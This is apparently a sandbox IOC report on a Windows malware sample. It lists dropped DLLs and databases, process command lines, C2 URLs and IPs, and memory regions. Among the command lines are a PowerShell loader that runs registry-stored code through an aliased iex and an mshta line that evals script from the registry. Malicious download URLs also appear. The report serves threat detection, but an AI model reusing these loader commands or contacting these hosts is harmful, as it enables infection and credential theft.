IOC Report
EJ6FBXJ9Dg.exe

loading gif

Files

File Path
Type
Category
Malicious
EJ6FBXJ9Dg.exe
PE32 executable (GUI) Intel 80386, for MS Windows
initial sample
malicious
C:\Users\user\AppData\LocalLow\freebl3.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\LocalLow\mozglue.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\LocalLow\nss3.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\LocalLow\softokn3.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\LocalLow\sqlite3.dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\jv54rgf4.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\mkr2iq4u.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (348), with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\mkr2iq4u.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\XHSRZM23.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\LocalLow\2If3OY9WA2aU
SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\LocalLow\msvcp140.dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\LocalLow\pU97tg112OjD
SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
dropped
C:\Users\user\AppData\LocalLow\sF9O6f0cCdbK
SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
dropped
C:\Users\user\AppData\LocalLow\vcruntime140.dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\LocalLow\y3enbS6322L5
SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Temp\CSC20F2306B39284E32B5AB6E9725E2189D.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\CSCC9AB450BCFA441ED9B999D6FD5DE3822.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\RESF206.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols, created Thu Oct 13 06:49:52 2022, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\RESFF35.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols, created Thu Oct 13 06:49:56 2022, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_isg504bu.mfz.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jtb51wp4.4ti.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\jv54rgf4.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text
dropped
C:\Users\user\AppData\Local\Temp\jv54rgf4.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (348), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\jv54rgf4.out
Unicode text, UTF-8 (with BOM) text, with very long lines (427), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\mkr2iq4u.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text
dropped
C:\Users\user\AppData\Local\Temp\mkr2iq4u.out
Unicode text, UTF-8 (with BOM) text, with very long lines (427), with CRLF, CR line terminators
modified
There are 18 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\EJ6FBXJ9Dg.exe
C:\Users\user\Desktop\EJ6FBXJ9Dg.exe
malicious
C:\Users\user\AppData\Roaming\XHSRZM23.exe
"C:\Users\user\AppData\Roaming\XHSRZM23.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nhefowhe -value gp; new-alias -name ucvjneg -value iex; ucvjneg ([System.Text.Encoding]::ASCII.GetString((nhefowhe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mkr2iq4u.cmdline
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jv54rgf4.cmdline
malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ndam='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ndam).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF206.tmp" "c:\Users\user\AppData\Local\Temp\CSCC9AB450BCFA441ED9B999D6FD5DE3822.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFF35.tmp" "c:\Users\user\AppData\Local\Temp\CSC20F2306B39284E32B5AB6E9725E2189D.TMP"

URLs

Name
IP
Malicious
http://188.127.227.51/
188.127.227.51
malicious
http://188.127.227.51/49d6ec0cd113efb59453fa49c7f2abcd
188.127.227.51
malicious
http://45.8.158.104/uploaded/7PEROc7T_2Fgr3AlFhC44I/HihA8yGOnHHyC/7qKpRjMK/_2BISfbG8Z1hpAn69C67v7h/gkKIfJKu9W/RfGqkB9ODhAT7t3c5/NgU9QmTJW10x/ljH6Rbwk6Te/NQKogNebUNXkBe/OP8YU_2BPfX7w7JRWnzlY/DYJ2tPBGUU9yVi7O/2UHx3wnrI8usjfi/mEy_2FvxgACU_2BVfF/k_2BhGhcG/DY4c1ymhU_2BCF0kWEYq/M0_2B_2F16h_2BgoOGF/9_2FtG_2F6BZfr3nq2A72O/TaGtamWcSmCx5/BKV7x7CGne61RjWS63/G.pct
45.8.158.104
https://duckduckgo.com/chrome_newtab
unknown
http://nuget.org/NuGet.exe
unknown
http://www.mozilla.com/en-US/blocklist/
unknown
https://duckduckgo.com/ac/?q=
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://constitution.org/usdeclar.txtC:
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://search.yahoo.com?fr=crmas_sfpf
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
http://https://file://USER.ID%lu.exe/upd
unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
unknown
https://github.com/Pester/Pester
unknown
http://45.8.158.104/uploaded/zbAczskpRoi/wpOTNz2ovPWOn_/2B_2FrKEtFFbUGtGX6UpM/aPAjWjIABTFmZnGA/TX3qf
unknown
https://www.vign.
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
https://search.yahoo.com?fr=crmas_sfp
unknown
http://45.8.158.104/uploaded/Xac7t2mitXIgCMsf9BuB/MO0_2Fwxiby6n8I6o_2/FDgHHlLSuOuDkfbPQtCcKd/YlwrlyD
unknown
http://constitution.org/usdeclar.txt
unknown
http://45.8.158.104/uploaded/zbAczskpRoi/wpOTNz2ovPWOn_/2B_2FrKEtFFbUGtGX6UpM/aPAjWjIABTFmZnGA/TX3qfwxbX9aDBL1/IeT5piixzi8h4SRl9u/8_2B0Atg2/EH_2BuWU2tSI81tfObAy/vUlIlX4Ry5a2Lkg_2BA/WrsB69Jk6Nr0AfUnViCZgr/xOQsHH2r7bRf4/GbUKvAO_/2B_2BNCAwjUDjs1PnMfwFho/BSlcplWuk_/2ByFg1B7Jha7Qhk7w/kMamT9D_2B57/Uw_2B3UVmpC/BA7AL3JebG7W65/8MiRPWVyAeG2AtQC9YkgU/qP7k.pct
45.8.158.104
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://qpdownloads.com/10103.exe
31.31.198.19
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://trackingg-protectioon.cdn1.mozilla.net/uploaded/1nOLBbA4MMg8uH2db9T/AXce5fVRPsPAKOJdUYw5Yz/f6
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
http://45.8.158.104/uploaded/7PEROc7T_2Fgr3AlFhC44I/HihA8yGOnHHyC/7qKpRjMK/_2BISfbG8Z1hpAn69C67v7h/g
unknown
https://mozilla.org0
unknown
http://www.sqlite.org/copyright.html.
unknown
http://45.8.158.104/uploaded/Xac7t2mitXIgCMsf9BuB/MO0_2Fwxiby6n8I6o_2/FDgHHlLSuOuDkfbPQtCcKd/YlwrlyDXRc_2B/ixVyFqQK/k126u_2B_2Ba_2BruFx1_2F/jniVE8w7fc/bk1R9cvUDCNSr3LVX/6pZVXtyVf482/WFP0247XYM7/A2gUdzKCCOqwfV/Gv8pnlgo2_2FOJ3S2ifKR/bqy_2FBRKHq_2Fpg/Vdjwqlx7uWisr2l/fEIsbd32W_2FSgiOj7/dytSGoyJO/SSfkZcDtemeWWSjAjk_2/FpEHeBUMQUi3yJQSNuD/_2FtYwM7I7Bk/pKYwZ.pct
45.8.158.104
There are 26 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
qpdownloads.com
31.31.198.19
trackingg-protectioon.cdn1.mozilla.net
unknown

IPs

IP
Domain
Country
Malicious
188.127.227.51
unknown
Russian Federation
malicious
45.8.158.104
unknown
Russian Federation
31.31.198.19
qpdownloads.com
Russian Federation

Memdumps

Base Address
Regiontype
Protect
Malicious
992000
heap
page read and write
malicious
24ABD467000
trusted library allocation
page read and write
malicious
992000
heap
page read and write
malicious
992000
heap
page read and write
malicious
24AC5DCC000
unkown
page read and write
malicious
12AC000
heap
page read and write
malicious
992000
heap
page read and write
malicious
1429000
heap
page read and write
malicious
14A8000
heap
page read and write
malicious
992000
heap
page read and write
malicious
14A8000
heap
page read and write
malicious
992000
heap
page read and write
malicious
992000
heap
page read and write
malicious
13AA000
heap
page read and write
malicious
992000
heap
page read and write
malicious
992000
heap
page read and write
malicious
112F000
heap
page read and write
malicious
14A8000
heap
page read and write
malicious
14A8000
heap
page read and write
malicious
992000
heap
page read and write
malicious
992000
heap
page read and write
malicious
992000
heap
page read and write
malicious
992000
heap
page read and write
malicious
992000
heap
page read and write
malicious
14A8000
heap
page read and write
malicious
992000
heap
page read and write
malicious
992000
heap
page read and write
malicious
14A8000
heap
page read and write
malicious
992000
heap
page read and write
malicious
992000
heap
page read and write
malicious
992000
heap
page read and write
malicious
992000
heap
page read and write
malicious
14A8000
heap
page read and write
malicious
992000
heap
page read and write
malicious
992000
heap
page read and write
malicious
992000
heap
page read and write
malicious
992000
heap
page read and write
malicious
24AC56F0000
direct allocation
page execute and read and write
malicious
14A8000
heap
page read and write
malicious
992000
heap
page read and write
malicious
992000
heap
page read and write
malicious
992000
heap
page read and write
malicious
14A8000
heap
page read and write
malicious
14A8000
heap
page read and write
malicious
24ABDA02000
trusted library allocation
page read and write
3FD7000
trusted library allocation
page read and write
294E6BEB000
direct allocation
page read and write
1DEADF00000
trusted library allocation
page read and write
24AC5740000
heap
page read and write
1C68B738000
heap
page read and write
469000
unclassified section
page readonly
1F0000
trusted library allocation
page read and write
24AC56E0000
trusted library section
page read and write
99D000
heap
page read and write
294E52C7000
heap
page read and write
24AAB400000
heap
page read and write
99C000
heap
page read and write
24AC578E000
heap
page read and write
1C68B6E1000
heap
page read and write
22C51ABC000
heap
page read and write
294E5345000
heap
page read and write
2244CD7A000
heap
page read and write
18028D4A000
heap
page read and write
24AC5730000
trusted library allocation
page read and write
22C4F743000
heap
page read and write
3FDE000
trusted library allocation
page read and write
2244CB50000
heap
page read and write
294E52E6000
heap
page read and write
24AB0707000
trusted library allocation
page read and write
294E5420000
heap
page read and write
7FF817EBD000
trusted library allocation
page execute and read and write
5E22C7A000
stack
page read and write
2244CD7D000
heap
page read and write
397A000
trusted library allocation
page read and write
9BA000
heap
page read and write
24AC5690000
trusted library allocation
page read and write
24AC5540000
heap
page execute and read and write
480000
heap
page read and write
7FF818150000
trusted library allocation
page read and write
24AB117B000
trusted library allocation
page read and write
24AC56F3000
trusted library allocation
page read and write
7FF817EB4000
trusted library allocation
page read and write
957000
heap
page read and write
1C68B6F2000
heap
page read and write
92A000
heap
page read and write
22C51ACD000
heap
page read and write
2244CC4D000
heap
page read and write
24AC5697000
trusted library allocation
page read and write
24AC578E000
heap
page read and write
99D000
heap
page read and write
22C51ABC000
heap
page read and write
9C4000
heap
page read and write
1C68B6DA000
heap
page read and write
5E225D5000
stack
page read and write
FA8000
heap
page read and write
24ABE6E2000
trusted library allocation
page read and write
24AAB49B000
heap
page read and write
24AB0C59000
trusted library allocation
page read and write
7FF818260000
trusted library allocation
page read and write
2244CD22000
heap
page read and write
7FF818094000
trusted library allocation
page read and write
5E22D37000
stack
page read and write
401000
unkown
page execute read
2244CC30000
trusted library allocation
page read and write
FA8000
heap
page read and write
294E5160000
remote allocation
page read and write
954000
heap
page read and write
1C68B7A0000
heap
page read and write
2244CCF3000
heap
page read and write
24AC5710000
trusted library allocation
page read and write
294E5322000
heap
page read and write
1DEADD81000
heap
page read and write
24ABD4D5000
trusted library allocation
page read and write
24AC5730000
trusted library allocation
page read and write
7FF818052000
trusted library allocation
page read and write
22C51AAC000
heap
page read and write
560000
trusted library allocation
page read and write
24AB0F85000
trusted library allocation
page read and write
22C51ABF000
heap
page read and write
9D6000
heap
page read and write
1C68B72B000
heap
page read and write
24AC56F0000
trusted library allocation
page read and write
2244CCFD000
heap
page read and write
24AC5690000
trusted library allocation
page read and write
3ECE000
trusted library allocation
page read and write
24AC56F0000
trusted library allocation
page read and write
22C4EDC5000
trusted library allocation
page read and write
99D000
heap
page read and write
9BCBFF000
stack
page read and write
22C4EDE0000
heap
page read and write
1DEADD84000
heap
page read and write
24AC5838000
heap
page read and write
24ABE4E2000
trusted library allocation
page read and write
22C4F6F6000
heap
page read and write
B0AE3F7000
stack
page read and write
24AC569B000
trusted library allocation
page read and write
22C4EDA4000
trusted library allocation
page read and write
14A8000
heap
page read and write
5E23A8E000
stack
page read and write
24AACE30000
trusted library allocation
page read and write
22C4EDA4000
trusted library allocation
page read and write
24AC56F3000
trusted library allocation
page read and write
1C68B712000
heap
page read and write
24AADDF2000
trusted library allocation
page read and write
955000
heap
page read and write
3FD7000
trusted library allocation
page read and write
22C4F707000
heap
page read and write
294E52CA000
heap
page read and write
294E5332000
heap
page read and write
3AAF000
stack
page read and write
294E6C30000
direct allocation
page read and write
7FF81806C000
trusted library allocation
page read and write
24AC5710000
trusted library allocation
page read and write
9CA000
heap
page read and write
2244CD0A000
heap
page read and write
920000
heap
page read and write
1C68B800000
direct allocation
page read and write
1DEADE40000
trusted library allocation
page read and write
24AC5690000
trusted library allocation
page read and write
1C68B6DF000
heap
page read and write
24AC56F0000
trusted library allocation
page read and write
2244CD59000
heap
page read and write
3F8000
heap
page read and write
294E52B0000
heap
page read and write
38B1000
heap
page read and write
9B5000
heap
page read and write
1C68B74C000
heap
page read and write
2244CCDB000
heap
page read and write
369F000
stack
page read and write
9E1000
heap
page read and write
3FC6000
trusted library allocation
page read and write
24AC5785000
heap
page read and write
2244CD32000
heap
page read and write
24AC59A0000
trusted library allocation
page read and write
24AC56D0000
trusted library allocation
page read and write
359E000
stack
page read and write
3FDE000
trusted library allocation
page read and write
1C68B747000
heap
page read and write
24AC56FB000
trusted library allocation
page read and write
294E5338000
heap
page read and write
6BC000
heap
page read and write
24AC56D0000
trusted library allocation
page read and write
24AC5950000
unkown
page read and write
24AC5710000
trusted library allocation
page read and write
9CD000
heap
page read and write
22C4F747000
heap
page read and write
FFE000
stack
page read and write
24AC5730000
trusted library allocation
page read and write
24AC56A0000
heap
page execute and read and write
22C4F766000
heap
page read and write
22C4F6F6000
heap
page read and write
24AACFDF000
heap
page read and write
957000
heap
page read and write
294E52C7000
heap
page read and write
FA8000
heap
page read and write
7C5000
trusted library allocation
page read and write
24AACF6D000
heap
page read and write
24AC5950000
trusted library allocation
page read and write
2244CD3E000
heap
page read and write
24AC5847000
heap
page read and write
24AAD248000
trusted library allocation
page read and write
24AC5710000
trusted library allocation
page read and write
1DEADF95000
heap
page read and write
24AC5690000
trusted library allocation
page read and write
860000
heap
page read and write
24AB1161000
trusted library allocation
page read and write
2244CD3B000
heap
page read and write
24AB076D000
trusted library allocation
page read and write
2244CFE0000
heap
page read and write
22C4EDA4000
trusted library allocation
page read and write
406000
unkown
page readonly
19C87F80000
heap
page read and write
24AC56F0000
trusted library allocation
page read and write
5E229FE000
stack
page read and write
2244CD7A000
heap
page read and write
5E23B0E000
unkown
page read and write
24AC5690000
trusted library allocation
page read and write
14AC000
heap
page read and write
5E22DB8000
stack
page read and write
1C68D080000
direct allocation
page read and write
24AB0FB3000
trusted library allocation
page read and write
22C51AB9000
heap
page read and write
2244CD3B000
heap
page read and write
24AC5960000
trusted library allocation
page read and write
22C51AD5000
heap
page read and write
3FEC000
trusted library allocation
page read and write
24AC56F2000
trusted library allocation
page read and write
22C4ED9E000
trusted library allocation
page read and write
24AC5690000
trusted library allocation
page read and write
24AC56FB000
trusted library allocation
page read and write
1C68B6A0000
heap
page read and write
24AC56F3000
trusted library allocation
page read and write
22C51AD6000
heap
page read and write
6F9000
stack
page read and write
24AB1172000
trusted library allocation
page read and write
24AC5690000
trusted library allocation
page read and write
1004FF000
stack
page read and write
193B7FE000
stack
page read and write
99D000
heap
page read and write
24AC5700000
trusted library allocation
page read and write
6B7000
heap
page read and write
24AC5691000
trusted library allocation
page read and write
294E80A2000
direct allocation
page read and write
1DEADFA0000
trusted library allocation
page read and write
24AC56F0000
trusted library allocation
page read and write
24AC56F0000
trusted library allocation
page read and write
3FB0000
trusted library allocation
page read and write
9DD000
heap
page read and write
294E52E1000
heap
page read and write
97D000
heap
page read and write
3EB0000
trusted library allocation
page read and write
30000
heap
page read and write
24AC5700000
trusted library allocation
page read and write
1C68B74F000
heap
page read and write
22C4EDA8000
trusted library allocation
page read and write
24AC56D0000
trusted library allocation
page read and write
460000
unclassified section
page read and write
24AC56F0000
trusted library allocation
page read and write
7FF818110000
trusted library allocation
page read and write
24AC5691000
trusted library allocation
page read and write
1C68B6A9000
heap
page read and write
2244CD3C000
heap
page read and write
22C4EDC5000
trusted library allocation
page read and write
22C4F762000
heap
page read and write
22C4EDC5000
trusted library allocation
page read and write
22C51AB9000
heap
page read and write
22C4EEF0000
trusted library allocation
page read and write
294E52C6000
heap
page read and write
7FF818230000
trusted library allocation
page read and write
2244CD51000
heap
page read and write
1C68B736000
heap
page read and write
1C68B730000
heap
page read and write
24AC5950000
trusted library allocation
page read and write
79F633B000
stack
page read and write
22C4F743000
heap
page read and write
2CEF000
stack
page read and write
38B0000
heap
page read and write
2244CCDB000
heap
page read and write
24ABD506000
trusted library allocation
page read and write
1C68D03B000
direct allocation
page read and write
18028B60000
heap
page read and write
2244CCFD000
heap
page read and write
FA8000
heap
page read and write
294E52E6000
heap
page read and write
22C4E984000
heap
page read and write
294E52D1000
heap
page read and write
24AC56E0000
trusted library allocation
page read and write
38B4000
trusted library allocation
page read and write
29EA000
stack
page read and write
24AC578E000
heap
page read and write
7FF818100000
trusted library allocation
page read and write
B00000
unkown
page read and write
6D2000
heap
page read and write
24ABE32A000
trusted library allocation
page read and write
22C51AC3000
heap
page read and write
2D2E000
stack
page read and write
C0E000
stack
page read and write
24AACFDC000
heap
page read and write
1C68B74C000
heap
page read and write
24AC5700000
trusted library allocation
page read and write
954000
heap
page read and write
951000
heap
page read and write
24ABDBE2000
trusted library allocation
page read and write
24AC5776000
heap
page read and write
2244CD16000
heap
page read and write
24AC5690000
trusted library allocation
page read and write
2244CD27000
heap
page read and write
24ABE50A000
trusted library allocation
page read and write
24AACDF0000
heap
page readonly
2244CD53000
heap
page read and write
99D000
heap
page read and write
24AC56F0000
trusted library allocation
page read and write
193B9FE000
stack
page read and write
1DEADEA0000
trusted library allocation
page read and write
24AC5970000
trusted library allocation
page read and write
24AC56F2000
trusted library allocation
page read and write
7C3000
trusted library allocation
page read and write
24AC56F3000
trusted library allocation
page read and write
9DD000
heap
page read and write
24AC56D0000
trusted library allocation
page read and write
22C4ED9F000
trusted library allocation
page read and write
24AC56D0000
trusted library allocation
page read and write
24ABDBDD000
trusted library allocation
page read and write
24AC5690000
trusted library allocation
page read and write
7FF8180A0000
trusted library allocation
page execute and read and write
22C51AC3000
heap
page read and write
294E8070000
direct allocation
page read and write
22C51AA8000
heap
page read and write
1C68B6D7000
heap
page read and write
22C4EDA1000
trusted library allocation
page read and write
24AAB51B000
heap
page read and write
22C4F75A000
heap
page read and write
24ABD657000
trusted library allocation
page read and write
AF0000
unkown
page readonly
22C51ABF000
heap
page read and write
2244CD15000
heap
page read and write
24ABE322000
trusted library allocation
page read and write
7FF817EC3000
trusted library allocation
page read and write
733000
heap
page read and write
24AC5997000
trusted library allocation
page read and write
951000
heap
page read and write
22C4EDA4000
trusted library allocation
page read and write
9BC73C000
stack
page read and write
404000
unkown
page write copy
14AB000
heap
page read and write
880000
heap
page read and write
22C4F751000
heap
page read and write
FA8000
heap
page read and write
24AC5690000
trusted library allocation
page read and write
24AC5730000
trusted library allocation
page read and write
3FEC000
trusted library allocation
page read and write
2244CD61000
heap
page read and write
294E5160000
remote allocation
page read and write
9C4000
heap
page read and write
954000
heap
page read and write
9DE000
heap
page read and write
24AC5730000
trusted library allocation
page read and write
294E6BD7000
direct allocation
page read and write
24ABE6F2000
trusted library allocation
page read and write
7FF817FD0000
trusted library allocation
page execute and read and write
10B0000
heap
page read and write
24AAD3F2000
trusted library allocation
page read and write
954000
heap
page read and write
3FD6000
trusted library allocation
page read and write
345C000
stack
page read and write
22C4E99E000
heap
page read and write
22C4F75F000
heap
page read and write
24AC56F2000
trusted library allocation
page read and write
4A9E8FC000
stack
page read and write
1C68B72E000
heap
page read and write
22C4EDC5000
trusted library allocation
page read and write
9BCAFE000
stack
page read and write
2244CCCF000
heap
page read and write
AA0000
heap
page read and write
24AB1035000
trusted library allocation
page read and write
294E80B0000
direct allocation
page read and write
2244CD22000
heap
page read and write
7FF817EC0000
trusted library allocation
page read and write
7FF8181E0000
trusted library allocation
page read and write
24AB116A000
trusted library allocation
page read and write
22C4F727000
heap
page read and write
24AC5694000
trusted library allocation
page read and write
7FF818140000
trusted library allocation
page read and write
24AC5960000
trusted library allocation
page read and write
22C4ED97000
trusted library allocation
page read and write
9DD000
heap
page read and write
1C68B840000
heap
page read and write
7FF818056000
trusted library allocation
page read and write
1DEADD30000
heap
page read and write
24AC5690000
trusted library allocation
page read and write
3EF8000
trusted library allocation
page read and write
294E52B9000
heap
page read and write
24AAD1F1000
trusted library allocation
page read and write
402000
unkown
page readonly
19C87EF0000
heap
page read and write
294E5345000
heap
page read and write
24AC5730000
trusted library allocation
page read and write
22C4EDA4000
trusted library allocation
page read and write
22C51ABC000
heap
page read and write
9CD000
heap
page read and write
37DF000
stack
page read and write
24AC5690000
trusted library allocation
page read and write
2244CD08000
heap
page read and write
402000
unkown
page readonly
1DEADE30000
trusted library allocation
page read and write
24AC56F0000
trusted library allocation
page read and write
24AC5710000
trusted library allocation
page read and write
9DD000
heap
page read and write
733000
heap
page read and write
5E2287E000
stack
page read and write
955000
heap
page read and write
24ABD674000
trusted library allocation
page read and write
22C51AAC000
heap
page read and write
294E6BD0000
direct allocation
page read and write
3FEC000
trusted library allocation
page read and write
AFD000
unkown
page readonly
954000
heap
page read and write
2244CD4F000
heap
page read and write
22C4F75A000
heap
page read and write
22C4F762000
heap
page read and write
294E531A000
heap
page read and write
103E000
stack
page read and write
24AC5690000
trusted library allocation
page read and write
22C4EDA6000
trusted library allocation
page read and write
2244CD59000
heap
page read and write
14A8000
heap
page read and write
6BC000
heap
page read and write
24AC56FB000
trusted library allocation
page read and write
24AC5690000
trusted library allocation
page read and write
24AAD1E0000
heap
page execute and read and write
954000
heap
page read and write
24ABE4D6000
trusted library allocation
page read and write
24AC5950000
trusted library allocation
page read and write
24AAE7F2000
trusted library allocation
page read and write
294E5260000
heap
page read and write
24AC56F4000
trusted library allocation
page read and write
7FF817F66000
trusted library allocation
page read and write
294E6C10000
heap
page read and write
7FF818240000
trusted library allocation
page read and write
294E6BD3000
direct allocation
page read and write
24AC5847000
heap
page read and write
24ABE2D6000
trusted library allocation
page read and write
24AC573A000
trusted library allocation
page read and write
22C4EDC5000
trusted library allocation
page read and write
99D000
heap
page read and write
1C68B6ED000
heap
page read and write
2244CD7C000
heap
page read and write
22C51ACD000
heap
page read and write
22C4ED9E000
trusted library allocation
page read and write
24AC56F0000
trusted library allocation
page read and write
485000
heap
page read and write
955000
heap
page read and write
24AB112D000
trusted library allocation
page read and write
24AB0FC5000
trusted library allocation
page read and write
24AC5690000
trusted library allocation
page read and write
294E6BED000
direct allocation
page read and write
24AC5990000
trusted library allocation
page read and write
22C51AAB000
heap
page read and write
24AB06FE000
trusted library allocation
page read and write
24AC56E0000
trusted library allocation
page read and write
22C4ED9E000
trusted library allocation
page read and write
1C68B74F000
heap
page read and write
84D000
stack
page read and write
2FBF000
stack
page read and write
24AC56F3000
trusted library allocation
page read and write
24AC5960000
trusted library allocation
page read and write
22C4F743000
heap
page read and write
24AC56FB000
trusted library allocation
page read and write
24AC5960000
trusted library allocation
page read and write
24AC56F2000
trusted library allocation
page read and write
1C68B70B000
heap
page read and write
2F88000
trusted library allocation
page read and write
24AC5730000
trusted library allocation
page read and write
7FF817F60000
trusted library allocation
page read and write
9C5000
heap
page read and write
9DD000
heap
page read and write
24AB114A000
trusted library allocation
page read and write
1C68B6D6000
heap
page read and write
1DEADEE0000
trusted library allocation
page read and write
24AC5710000
trusted library allocation
page read and write
24AC5700000
trusted library allocation
page read and write
24AC56F0000
trusted library allocation
page read and write
99D000
heap
page read and write
7FF818180000
trusted library allocation
page read and write
954000
heap
page read and write
2244CD34000
heap
page read and write
5E22A7D000
stack
page read and write
22C4F751000
heap
page read and write
4A9E3FE000
stack
page read and write
22C4EDC5000
trusted library allocation
page read and write
24AC5960000
trusted library allocation
page read and write
22C4EDE4000
heap
page read and write
24AC5690000
trusted library allocation
page read and write
294E8050000
direct allocation
page read and write
24AC56F3000
trusted library allocation
page read and write
24AC5690000
trusted library allocation
page read and write
24ABE52A000
trusted library allocation
page read and write
99D000
heap
page read and write
740000
trusted library allocation
page read and write
24AC5694000
trusted library allocation
page read and write
2E10000
heap
page read and write
3FD7000
trusted library allocation
page read and write
294E52DC000
heap
page read and write
99D000
heap
page read and write
22C4EDC5000
trusted library allocation
page read and write
4A9E2FD000
stack
page read and write
2244CD4D000
heap
page read and write
294E52A2000
heap
page read and write
9DD000
heap
page read and write
22C4F75F000
heap
page read and write
7FF817EB0000
trusted library allocation
page read and write
80E000
stack
page read and write
2244CD4B000
heap
page read and write
22C4ED97000
trusted library allocation
page read and write
9DD000
heap
page read and write
2244CD53000
heap
page read and write
7FF8180E0000
trusted library allocation
page read and write
9D4000
heap
page read and write
7FF8180E9000
trusted library allocation
page read and write
2244CD73000
heap
page read and write
7FF818200000
trusted library allocation
page read and write
24AC56D0000
trusted library allocation
page read and write
7FF818130000
trusted library allocation
page read and write
24AC5990000
trusted library allocation
page read and write
2244CD61000
heap
page read and write
24AC5960000
trusted library allocation
page read and write
294E80BF000
direct allocation
page read and write
24AAB7D0000
heap
page read and write
3A25000
trusted library allocation
page read and write
1C68B5A0000
remote allocation
page read and write
19C87D90000
heap
page read and write
24AC56D0000
trusted library allocation
page read and write
24AC5ACF000
heap
page read and write
24AC5690000
trusted library allocation
page read and write
24ABE04A000
trusted library allocation
page read and write
22C4EDC5000
trusted library allocation
page read and write
24AC56D0000
trusted library allocation
page read and write
24AC56FB000
trusted library allocation
page read and write
955000
heap
page read and write
22C4EDA4000
trusted library allocation
page read and write
24AC56F1000
trusted library allocation
page read and write
22C4F75A000
heap
page read and write
24AB0F69000
trusted library allocation
page read and write
24AB102C000
trusted library allocation
page read and write
24AC5697000
trusted library allocation
page read and write
24AC5731000
trusted library allocation
page read and write
2244CCEA000
heap
page read and write
2244CD73000
heap
page read and write
24ABD9FA000
trusted library allocation
page read and write
24AC56F0000
trusted library allocation
page read and write
3899000
